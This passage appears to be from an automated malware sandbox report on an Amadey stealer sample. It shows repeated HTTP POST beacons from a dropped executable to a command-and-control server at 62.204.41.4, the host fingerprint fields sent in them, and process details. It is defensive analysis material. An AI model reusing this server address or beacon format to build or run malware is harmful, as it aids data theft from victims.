                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    83 | 192.168.2.3 | 49785 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:40.215517998 CET | 284 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:40.279097080 CET | 284 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    84 | 192.168.2.3 | 49786 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:40.457663059 CET | 285 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:40.520906925 CET | 285 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    85 | 192.168.2.3 | 49787 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:40.714503050 CET | 286 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:40.777539968 CET | 286 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    86 | 192.168.2.3 | 49788 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:40.954035997 CET | 287 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:41.018948078 CET | 287 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    87 | 192.168.2.3 | 49789 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:41.224339962 CET | 288 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:41.289380074 CET | 288 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    88 | 192.168.2.3 | 49790 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:41.465182066 CET | 289 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:41.529822111 CET | 289 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    89 | 192.168.2.3 | 49791 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:41.723772049 CET | 290 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:41.787893057 CET | 290 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    9 | 192.168.2.3 | 49710 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:11.651176929 CET | 209 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:11.715651035 CET | 210 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    90 | 192.168.2.3 | 49792 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:41.968818903 CET | 291 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.032325029 CET | 291 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    91 | 192.168.2.3 | 49793 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:42.202188969 CET | 292 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.270839930 CET | 292 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    92 | 192.168.2.3 | 49794 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:42.450951099 CET | 293 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.513572931 CET | 293 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    93 | 192.168.2.3 | 49795 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:42.683943987 CET | 294 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.746000051 CET | 294 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    94 | 192.168.2.3 | 49796 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:42.929790974 CET | 295 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.994865894 CET | 295 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    95 | 192.168.2.3 | 49797 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:43.170404911 CET | 296 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:43.236171007 CET | 296 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    96 | 192.168.2.3 | 49798 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:43.430749893 CET | 297 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:43.495352983 CET | 297 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    97 | 192.168.2.3 | 49799 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:43.671152115 CET | 298 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:43.735203028 CET | 298 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    98 | 192.168.2.3 | 49800 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:43.904290915 CET | 299 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:43.967133045 CET | 299 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    99 | 192.168.2.3 | 49801 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:44.140311003 CET | 300 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:44.205696106 CET | 300 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Target ID:0
                                                                    Start time:21:30:00
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\file.exe
                                                                    Imagebase:0x11d0000
                                                                    File size:582144 bytes
                                                                    MD5 hash:392470D5B5723C386B943751C15721A6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Target ID:1
                                                                    Start time:21:30:01
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                                                                    Imagebase:0xf80000
                                                                    File size:391168 bytes
                                                                    MD5 hash:03D901B08C7DE9A3C6323A8C6DF73569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
